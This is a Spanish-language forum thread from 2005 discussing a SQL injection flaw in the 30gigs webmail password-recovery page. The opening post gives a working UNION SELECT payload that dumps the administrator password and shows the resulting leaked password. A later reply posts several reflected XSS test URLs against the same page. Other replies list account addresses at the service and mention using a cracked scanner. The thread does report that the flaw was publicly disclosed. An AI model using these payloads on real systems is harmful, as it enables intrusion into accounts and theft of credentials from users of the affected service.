elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
22 Marzo 2010, 10:17  


Temas destacados: [BLOG] Advisory: ffmpeg puede grabar X de cualquier usuario


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderadores: Anon, berz3k)
| | |-+  [OB] 30gigs SQL injection vulnerability
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Imprimir
Autor Tema: [OB] 30gigs SQL injection vulnerability  (Leído 6822 veces)
mousehack

Desconectado Desconectado

Mensajes: 1.144

Ex-Colaborador....!!!!!!XD


Ver Perfil
[OB] 30gigs SQL injection vulnerability
« en: 18 Noviembre 2005, 15:52 »

Existe una vulnerabilidad en el servicio de mail de 30gigs que permite el acceso a las contraseñas

Esta vulnerabilidad se encuentra en:

http://www.30gigs.com/getpassword/

debido a que no valida correctamente los datos ingresados por los usuarios.

Prueba de Concepto:
------------------------
ingresamos en http://www.30gigs.com/getpassword/
y pegamos lo siguiente:

Código:
not_existant' union select 1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where userLogin='admin

producira un resultado como el siguiente, donde ¨runsit" es la contraseña de la cuenta del administrador:

Código:
We have sent the password for your not_existant' union select 1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where userLogin='admin@30gigs.com account to runsit

otras pruebas son admisibles

Fuente:www.addict3d.org

Salu2
« Última modificación: 31 Diciembre 2005, 08:23 por Sirdarckcat » En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Kasswed
Moderador Global
*****
Conectado Conectado

Mensajes: 4.894


Ver Perfil
Re: 30gigs SQL injection vulnerability
« Respuesta #1 en: 18 Noviembre 2005, 17:06 »

Siguen saliendo fallos en 30gigs... a este paso... xD

Saludos!
En línea

"He who allows himself to be insulted, deserves to be."

Repórtame cualquier falta a las normas del foro por mensaje privado.
Man-In-the-Middle

Desconectado Desconectado

Mensajes: 3.539



Ver Perfil
Re: 30gigs SQL injection vulnerability
« Respuesta #2 en: 18 Noviembre 2005, 21:13 »

god@30gigs.com , admin@30gigs.com , info@30gigs.com , test@30gigs.com , frank@30gigs.com , popeye@30gigs.com , human@30gigs.com , friend@30gigs.com , steven@30gigs.com , bob@30gigs.com , jim@30gigs.com , administrator@30gigs.com , jobs@30gigs.com , happy@30gigs.com , someone@30gigs.com , anyone@30gigs.com , you@30gigs.com , me@30gigs.com , emai@30gigs.com , account@30gigs.com , invite@30gigs.com

Me parece un abuso XD, y yo que tenia una cuenta y ese era mi pass para todo,


« Última modificación: 18 Noviembre 2005, 21:30 por Man-In-the-Middle » En línea
krispin

Desconectado Desconectado

Mensajes: 90


Ver Perfil WWW
Re: 30gigs SQL injection vulnerability
« Respuesta #3 en: 18 Noviembre 2005, 21:56 »

Vaya vaya,
esos de 30gigs son una cuadrilla de pencos,
joe,
pa rato me hago una cuenta.
algun dia pararan de salirles fallos increibles?
En línea
mousehack

Desconectado Desconectado

Mensajes: 1.144

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: 30gigs SQL injection vulnerability
« Respuesta #4 en: 18 Noviembre 2005, 22:00 »

jajajaj usas el mismo scaner que yo...XD, lastima que lo tengo crackeado y no me actualiza la base de datos :-\

Salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Rey11

Desconectado Desconectado

Mensajes: 3.241


¡¡VIVA ESPAÑA!!


Ver Perfil WWW
Re: 30gigs SQL injection vulnerability
« Respuesta #5 en: 18 Noviembre 2005, 22:06 »

Cual es ese escaner??
En línea


Jesús es el camino la verdad y la vida, todo adquiere sentido gracias a el, que gran verdad.
krispin

Desconectado Desconectado

Mensajes: 90


Ver Perfil WWW
Re: 30gigs SQL injection vulnerability
« Respuesta #6 en: 18 Noviembre 2005, 22:25 »

jeje, yo tambien lo he buscado,
pon en la mula acunetix
En línea
ANELKAOS
Moderador Global
*****
Desconectado Desconectado

Mensajes: 2.968



Ver Perfil WWW
Re: 30gigs SQL injection vulnerability
« Respuesta #7 en: 18 Noviembre 2005, 22:25 »

Funciona perfectamente  ;D
En línea

mousehack

Desconectado Desconectado

Mensajes: 1.144

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: 30gigs SQL injection vulnerability
« Respuesta #8 en: 18 Noviembre 2005, 22:29 »

www.acunetix.com

Salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
mousehack

Desconectado Desconectado

Mensajes: 1.144

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: 30gigs SQL injection vulnerability
« Respuesta #9 en: 18 Noviembre 2005, 22:58 »

prueben este:

http://www.30gigs.com/getpassword/index.php?login=%3Cscript%3Ealert('mousehack-string-1987708322');%3C/script%3E&submit=Send%20Password&process=1

http://www.30gigs.com/getpassword/index.php?login=%3Cscript%3Ealert('wvs-xss-magic-string-1987708322');%3C/script%3E&submit=Send%20Password&process=1

http://www.30gigs.com/getpassword/index.php?login="><script>alert('mousehack-1859762011');</script>&submit=Send%20Password&process=1

http://www.30gigs.com/getpassword/index.php?login=%3C/textarea%3E%3Cscript%3Ealert('mousehack-71103827');%3C/script%3E&submit=Send%20Password&process=1

http://www.30gigs.com/getpassword/index.php?login=%3Cscript%3Evar%20wvs_xss_test_variable=1060092372;alert(mousehack_variable);%3C/script%3E&submit=Send%20Password&process=1

http://www.30gigs.com/getpassword/index.php?login='&submit=Send%20Password&process=1

no creo que valga la pena reportalo ;) o si?

Salu2
« Última modificación: 18 Noviembre 2005, 23:02 por mousehack » En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
ANELKAOS
Moderador Global
*****
Desconectado Desconectado

Mensajes: 2.968



Ver Perfil WWW
Re: 30gigs SQL injection vulnerability
« Respuesta #10 en: 18 Noviembre 2005, 23:09 »

En realidad ya les avisaron hace 2 semanas pero los de 30gigs.com no respondieron, a mi Gmail taró un solo dia pero bueno.... hay empresas responsables y otras...no tanto.

Citar
[...]The site has been notified about the vulnerability 2 weeks hago, but no response was taken.
FUENTE Y DESCUBRIDOR: http://seclists.org/lists/fulldisclosure/2005/Nov/0523.html

Nosotros ya lo avisamos!
Citar
[...]Nosotros hemos conseguido llegar al mismo resultado de tres formas distintas, las otras dos bastante mas simples, con lo que fácilmente se deduce que esto es un multibug, y un error de diseño. Con todas estas pistas no tardarán en salir nuevos métodos.
FUENTE: http://www.elhacker.net/gmailbug/
« Última modificación: 18 Noviembre 2005, 23:47 por ANELKAOS » En línea

: : : Sherneyko : : :

Desconectado Desconectado

Mensajes: 194

Solo el eco del silencio mis palabras oira...


Ver Perfil
Re: 30gigs SQL injection vulnerability
« Respuesta #11 en: 19 Noviembre 2005, 14:57 »

con esos bugs es mejor tener una cuenta que reenvie a la nuestra en 30gigs.com  , y no emviar desde 30gigs.com

hace cuanto se descubrio el bug?
En línea

Benedictus Vir Qui Suffert Tentationem Quoninam Quum Probates Fuerit Acipient Coronam Vitae.

Todos tienen un universo dentro de si...y esos universos sumados componen la realidad que pisamos
yagami2k2

Desconectado Desconectado

Mensajes: 289



Ver Perfil
Re: 30gigs SQL injection vulnerability
« Respuesta #12 en: 19 Noviembre 2005, 21:23 »

Así que todas las cuentas corren peligro ... que mal(mmm....suena muy tentador XD)

Suerte que no tengo nada importante en esa cuenta...

Citar
hay empresas responsables y otras...no tanto

Toda la razón, y esta parece que no ha tomado conciencia sobre lo que implica tener un bug como ese.

« Última modificación: 19 Noviembre 2005, 22:45 por yagami2k2 » En línea

We have the power
BenRu
The Prodigy

Desconectado Desconectado

Mensajes: 4.016


Primero la música y luego las palabras...


Ver Perfil
Re: 30gigs SQL injection vulnerability
« Respuesta #13 en: 20 Noviembre 2005, 17:12 »

Valla valla con esta gente...
Ahora se esta dando mucho esto....

El acunetix ese funciona bien?
En línea

"El arte está hecho para ser sentido y no para ser comprendido. Por eso, cada vez que se quiere hablar de él según la inteligencia, no se dicen mas que tonterías" Remy D Gourmont
Maximiliano Jose

Desconectado Desconectado

Mensajes: 35


MaxBox


Ver Perfil WWW
Re: 30gigs SQL injection vulnerability
« Respuesta #14 en: 20 Noviembre 2005, 22:16 »

vaya vaya con esta gente...
Ahora se esta dando mucho esto....

El acunetix ese funciona bien?

Al parecer si...
SAludos
En línea

Arrenkemos, ahi viene dios!
Páginas: [1] 2 Ir Arriba Imprimir 
Ir a:  





Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

Yashira.org    Videojuegos    indetectables.net    Seguridad Informatica Colombia    Indejuegos    Internet móvil

Noticias Informatica    Seguridad Informática    ADSL    eNYe Sec    Seguridad Wireless    Underground México    Biblioteca de Seguridad

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.11 | SMF © 2006-2008, Simple Machines LLC